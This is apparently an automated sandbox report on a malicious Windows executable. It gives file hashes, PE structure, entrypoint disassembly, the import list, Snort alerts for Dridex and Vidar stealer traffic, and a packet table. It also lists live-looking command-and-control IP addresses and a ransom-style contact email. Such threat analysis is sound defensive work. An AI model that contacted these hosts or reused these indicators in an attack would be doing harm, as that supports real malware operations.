our e-mail:..support@sysmail.ch....Reserve e-mail address to

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.740540192675917
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Q5W0I0pzFI.exe
File size:	803840
MD5:	78ada58842629a7c72f4ffa09877332d
SHA1:	b23c9b062b87df292edfb0c10ad83d1c26a91d37
SHA256:	79a45215fb18155b4ce7d6d4cde5351b7da9d25b0850431fd7f1b8373e9041b8
SHA512:	24fa6928a4ad4e1d48df11248fc34961d7d702adfdc2417e69a39cadcfc7a35593095f58259b3369daa408042a411190dac90d65d0e42e904814a9377e1d09ba
SSDEEP:	24576:TJEqWxuhKqz0oCGd4BxMIf9AXTXVJDZH+T7L:TRsqz0oldMryZHY
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?...{.j.{.j.{.j.e...i.j.e.....j.\...x.j.{.k...j.e...A.j.e...z.j.e...z.j.Rich{.j.........................PE..L...K..`...........

File Icon


Icon Hash:	aedaae9ecea62ea2

Static PE Info

General

Entrypoint:	0x40d9b0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x6017E54B [Mon Feb 1 11:26:03 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	962dcf4a4b969d5194f73601a217ba6f

Entrypoint Preview

Instruction
mov edi, edi
push ebp
mov ebp, esp
call 00007FD12905E0BBh
call 00007FD129054E36h
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov edi, edi
push ebp
mov ebp, esp
push FFFFFFFEh
push 00427410h
push 00411150h
mov eax, dword ptr fs:[00000000h]
push eax
add esp, FFFFFF94h
push ebx
push esi
push edi
mov eax, dword ptr [004BB4ECh]
xor dword ptr [ebp-08h], eax
xor eax, ebp
push eax
lea eax, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], eax
mov dword ptr [ebp-18h], esp
mov dword ptr [ebp-70h], 00000000h
mov dword ptr [ebp-04h], 00000000h
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [004011B4h]
mov dword ptr [ebp-04h], FFFFFFFEh
jmp 00007FD129054E48h
mov eax, 00000001h
ret
mov esp, dword ptr [ebp-18h]
mov dword ptr [ebp-78h], 000000FFh
mov dword ptr [ebp-04h], FFFFFFFEh
mov eax, dword ptr [ebp-78h]
jmp 00007FD129054F77h
mov dword ptr [ebp-04h], FFFFFFFEh
call 00007FD129054FB4h
mov dword ptr [ebp-6Ch], eax
push 00000001h
call 00007FD12905ECAAh
add esp, 04h
test eax, eax
jne 00007FD129054E2Ch
push 0000001Ch
call 00007FD129054F6Ch
add esp, 04h
call 00007FD1290591B4h
test eax, eax
jne 00007FD129054E2Ch
push 00000010h

Rich Headers

Programming Language:

[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[ASM] VS2008 build 21022
[LNK] VS2008 build 21022
[RES] VS2008 build 21022
[C++] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x27af0	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xe6000	0x93d0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x12d0	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x8aa8	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x278	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x279a0	0x27a00	False	0.41735262224	data	6.14330714213	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x29000	0xbc220	0x93200	False	0.987753557774	SysEx File - GreyMatter	7.98415551018	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0xe6000	0x93d0	0x9400	False	0.537478885135	data	5.60924489906	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_CURSOR	0xecf78	0x130	data	Uzbek	Italy
RT_CURSOR	0xed0a8	0xf0	data	Uzbek	Italy
RT_CURSOR	0xed198	0x10a8	dBase III DBT, version number 0, next free block index 40	Uzbek	Italy
RT_CURSOR	0xee270	0x8a8	dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"	Uzbek	Italy
RT_ICON	0xe64e0	0x8a8	dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"	Uzbek	Italy
RT_ICON	0xe6d88	0x6c8	dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"	Uzbek	Italy
RT_ICON	0xe7450	0x568	GLS_BINARY_LSB_FIRST	Uzbek	Italy
RT_ICON	0xe79b8	0x10a8	data	Uzbek	Italy
RT_ICON	0xe8a60	0x988	data	Uzbek	Italy
RT_ICON	0xe93e8	0x468	GLS_BINARY_LSB_FIRST	Uzbek	Italy
RT_ICON	0xe98b0	0x25a8	data	Uzbek	Italy
RT_ICON	0xebe58	0x10a8	data	Uzbek	Italy
RT_STRING	0xeec70	0x422	data	Uzbek	Italy
RT_STRING	0xef098	0x15e	data	Uzbek	Italy
RT_STRING	0xef1f8	0x1d6	data	Uzbek	Italy
RT_ACCELERATOR	0xecf48	0x30	data	Uzbek	Italy
RT_ACCELERATOR	0xecf28	0x20	data	Uzbek	Italy
RT_GROUP_CURSOR	0xee240	0x30	data	Uzbek	Italy
RT_GROUP_CURSOR	0xeeb18	0x14	data	Uzbek	Italy
RT_GROUP_ICON	0xecf00	0x22	data	Uzbek	Italy
RT_GROUP_ICON	0xe9850	0x5a	data	Uzbek	Italy
RT_VERSION	0xeeb30	0x140	MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79	Uzbek	Italy

Imports

DLL

Import

KERNEL32.dll

LoadLibraryA, OpenMutexW, SetLocaleInfoA, FindNextVolumeA, GetNamedPipeHandleStateA, FileTimeToLocalFileTime, EnumResourceTypesA, EnumResourceNamesA, FillConsoleOutputCharacterA, DeleteTimerQueueTimer, TerminateThread, SetLastError, GetVersionExA, FreeResource, SetEvent, FindNextFileW, CopyFileExA, BuildCommDCBA, ReadConsoleOutputCharacterW, SetDefaultCommConfigW, VerLanguageNameW, GetCommConfig, WritePrivateProfileStructA, LocalFree, FindNextVolumeMountPointA, GetWriteWatch, WriteConsoleInputW, LoadResource, AddAtomA, GlobalDeleteAtom, GetThreadPriority, CallNamedPipeA, GetDriveTypeW, BuildCommDCBAndTimeoutsW, GetProcAddress, GlobalAlloc, GlobalFix, FindFirstChangeNotificationA, VerifyVersionInfoA, FormatMessageA, SetDllDirectoryA, GetModuleHandleW, WritePrivateProfileStringW, GetUserDefaultLCID, SetDllDirectoryW, SetConsoleTextAttribute, InterlockedDecrement, GetStartupInfoA, GetSystemWow64DirectoryW, CopyFileA, SetCalendarInfoW, DebugBreak, SetConsoleCursorInfo, FreeLibraryAndExitThread, GetModuleFileNameA, GetConsoleAliasExesLengthW, WaitForDebugEvent, InterlockedExchangeAdd, GetOEMCP, GetPrivateProfileStringA, CreateActCtxA, ReadConsoleInputW, OutputDebugStringA, PulseEvent, SetThreadAffinityMask, FlushConsoleInputBuffer, lstrlenA, WriteConsoleW, lstrcpyA, UnlockFile, FreeEnvironmentStringsA, GetConsoleCP, CreateIoCompletionPort, FreeConsole, GlobalGetAtomNameW, SetComputerNameA, GetConsoleAliasExesLengthA, CreateMailslotW, SetCommState, MoveFileWithProgressW, GetSystemTimeAdjustment, EnumSystemLocalesW, GetModuleHandleA, GetPrivateProfileIntA, WriteProfileStringW, GetLastError, OpenWaitableTimerW, GetConsoleAliasesLengthA, PeekNamedPipe, FillConsoleOutputCharacterW, BuildCommDCBAndTimeoutsA, GetConsoleAliasExesA, InterlockedIncrement, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, RaiseException, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetModuleFileNameW, RtlUnwind, ExitProcess, MoveFileA, DeleteFileA, GetStartupInfoW, HeapValidate, IsBadReadPtr, TlsGetValue, TlsAlloc, TlsSetValue, GetCurrentThreadId, TlsFree, GetStdHandle, WriteFile, GetFileType, OutputDebugStringW, LoadLibraryW, GetACP, GetCPInfo, IsValidCodePage, InitializeCriticalSectionAndSpinCount, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, HeapDestroy, HeapCreate, HeapFree, VirtualFree, FlushFileBuffers, WideCharToMultiByte, GetConsoleMode, HeapAlloc, HeapSize, HeapReAlloc, VirtualAlloc, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, SetFilePointer, CloseHandle, CreateFileA

Version Infos

Description	Data
Translations	0x0027 0x0306

Possible Origin

Language of compilation system	Country where language is spoken	Map
Uzbek	Italy

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
03/29/22-06:51:27.013823	TCP	2020826	ET TROJAN Potential Dridex.Maldoc Minimal Executable Request	49783	80	192.168.2.7	183.78.205.92
03/29/22-06:51:35.056059	TCP	2020826	ET TROJAN Potential Dridex.Maldoc Minimal Executable Request	49788	80	192.168.2.7	183.78.205.92
03/29/22-06:51:49.650526	TCP	2034813	ET TROJAN Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern	49793	80	192.168.2.7	5.252.23.88
03/29/22-06:52:25.789919	TCP	2034813	ET TROJAN Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern	49793	80	192.168.2.7	5.252.23.88

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 29, 2022 06:51:12.468142986 CEST	49781	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:12.468206882 CEST	443	49781	162.0.218.244	192.168.2.7
Mar 29, 2022 06:51:12.468321085 CEST	49781	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:12.726716042 CEST	49781	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:12.726756096 CEST	443	49781	162.0.218.244	192.168.2.7
Mar 29, 2022 06:51:12.792702913 CEST	443	49781	162.0.218.244	192.168.2.7
Mar 29, 2022 06:51:12.792834997 CEST	49781	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:13.245112896 CEST	49781	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:13.245167971 CEST	443	49781	162.0.218.244	192.168.2.7
Mar 29, 2022 06:51:13.245754004 CEST	443	49781	162.0.218.244	192.168.2.7
Mar 29, 2022 06:51:13.245871067 CEST	49781	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:13.248605013 CEST	49781	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:13.282548904 CEST	443	49781	162.0.218.244	192.168.2.7
Mar 29, 2022 06:51:13.282646894 CEST	443	49781	162.0.218.244	192.168.2.7
Mar 29, 2022 06:51:13.282742023 CEST	49781	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:13.282766104 CEST	49781	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:13.487001896 CEST	49781	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:13.487047911 CEST	443	49781	162.0.218.244	192.168.2.7
Mar 29, 2022 06:51:25.654746056 CEST	49782	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:25.654788971 CEST	443	49782	162.0.218.244	192.168.2.7
Mar 29, 2022 06:51:25.654949903 CEST	49782	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:25.933857918 CEST	49782	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:25.933911085 CEST	443	49782	162.0.218.244	192.168.2.7
Mar 29, 2022 06:51:25.994345903 CEST	443	49782	162.0.218.244	192.168.2.7
Mar 29, 2022 06:51:25.994517088 CEST	49782	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:26.007189989 CEST	49782	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:26.007208109 CEST	443	49782	162.0.218.244	192.168.2.7
Mar 29, 2022 06:51:26.007555008 CEST	443	49782	162.0.218.244	192.168.2.7
Mar 29, 2022 06:51:26.007626057 CEST	49782	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:26.010824919 CEST	49782	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:26.054198980 CEST	443	49782	162.0.218.244	192.168.2.7
Mar 29, 2022 06:51:26.060772896 CEST	443	49782	162.0.218.244	192.168.2.7
Mar 29, 2022 06:51:26.060898066 CEST	443	49782	162.0.218.244	192.168.2.7
Mar 29, 2022 06:51:26.060915947 CEST	49782	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:26.060961008 CEST	49782	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:26.124420881 CEST	49782	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:26.124450922 CEST	443	49782	162.0.218.244	192.168.2.7
Mar 29, 2022 06:51:26.682878971 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:26.804409027 CEST	49784	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:27.012162924 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:27.012346983 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:27.013823032 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:27.116319895 CEST	80	49784	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:27.116920948 CEST	49784	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:27.118391991 CEST	49784	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:27.542007923 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:27.632051945 CEST	80	49784	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:27.920449972 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:27.920504093 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:27.920614004 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:27.920660973 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:28.243746042 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:28.243802071 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:28.243844032 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:28.243882895 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:28.243908882 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:28.243952036 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:28.243957043 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:28.365341902 CEST	80	49784	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:28.365508080 CEST	49784	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:28.365681887 CEST	80	49784	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:28.365777016 CEST	49784	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:28.389406919 CEST	49784	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:28.566461086 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:28.566521883 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:28.566562891 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:28.566601038 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:28.566641092 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:28.566682100 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:28.566698074 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:28.566721916 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:28.566737890 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:28.566746950 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:28.566751957 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:28.566762924 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:28.566764116 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:28.566828966 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:28.701718092 CEST	80	49784	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:28.889168024 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:28.889249086 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:28.889295101 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:28.889314890 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:28.889333963 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:28.889374971 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:28.889394045 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:28.889425993 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:28.889441967 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:28.889470100 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:28.889509916 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:28.889528990 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:28.889544964 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:28.889549971 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:28.889585972 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:28.889590025 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:28.889631987 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:28.889667034 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:28.889671087 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:28.889681101 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:28.889697075 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:28.889712095 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:28.889745951 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:28.889751911 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:28.889781952 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:28.889796019 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:28.889834881 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:28.889836073 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:28.889846087 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:28.889877081 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:28.889898062 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:28.890077114 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:29.212342978 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.212404966 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.212456942 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.212486982 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:29.212516069 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:29.212521076 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:29.212521076 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.212584972 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.212585926 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:29.212651014 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.212696075 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.212712049 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:29.212718010 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:29.212738037 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.212779045 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.212824106 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:29.212830067 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:29.212833881 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:29.212836981 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.212903023 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.212917089 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:29.212950945 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.212970972 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:29.212992907 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.213007927 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:29.213033915 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.213088989 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:29.213092089 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.213094950 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:29.213160038 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.213222027 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.213241100 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:29.213246107 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:29.213284969 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.213345051 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.213387966 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.213428020 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.213471889 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.213510990 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.213514090 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:29.213521957 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:29.213526011 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:29.213531017 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:29.213535070 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:29.213537931 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:29.213551044 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.213591099 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.213608027 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:29.213613987 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:29.213629961 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.213670015 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.213706970 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:29.213709116 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.213713884 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:29.213718891 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:29.213751078 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.213788033 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.213789940 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:29.213854074 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:29.213860035 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:29.536742926 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.536798954 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.536842108 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.536863089 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:29.536881924 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.536890030 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:29.536895990 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:29.536923885 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.536946058 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:29.536964893 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.536994934 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:29.537007093 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.537033081 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:29.537050962 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.537087917 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:29.537092924 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.537116051 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:29.537133932 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.537158012 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:29.537174940 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.537214994 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.537240982 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:29.537249088 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:29.537256002 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.537270069 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:29.537297964 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.537342072 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.537343979 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:29.537364006 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:29.537404060 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.537419081 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.537435055 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:29.537441015 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.537482023 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:29.537484884 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:29.537491083 CEST	49783	80	192.168.2.7	183.78.205.92
